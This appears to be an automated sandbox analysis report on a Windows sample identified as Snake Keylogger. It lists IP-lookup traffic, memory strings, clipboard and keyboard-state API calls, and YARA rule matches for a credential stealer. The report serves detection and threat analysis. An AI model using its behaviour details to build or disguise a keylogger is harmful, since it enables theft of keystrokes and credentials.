                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000318A000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.drString found in binary or memory: http://checkip.dyndns.org/q
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: EmbeddedExe2.exe, 00000006.00000002.2310531102.000000000677A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe1.exe, EmbeddedExe1.exe, 00000005.00000000.2180190361.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, EmbeddedExe1.exe, 00000005.00000002.3395994788.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
                  Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00904164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00904164
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00904164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00904164
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB7060 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA,5_2_00007FF75ECB7060
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB85D0 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,GlobalFree,GlobalFree,5_2_00007FF75ECB85D0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00903F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00903F66
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008F001C
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0091CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0091CABC
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00BECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00BECABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
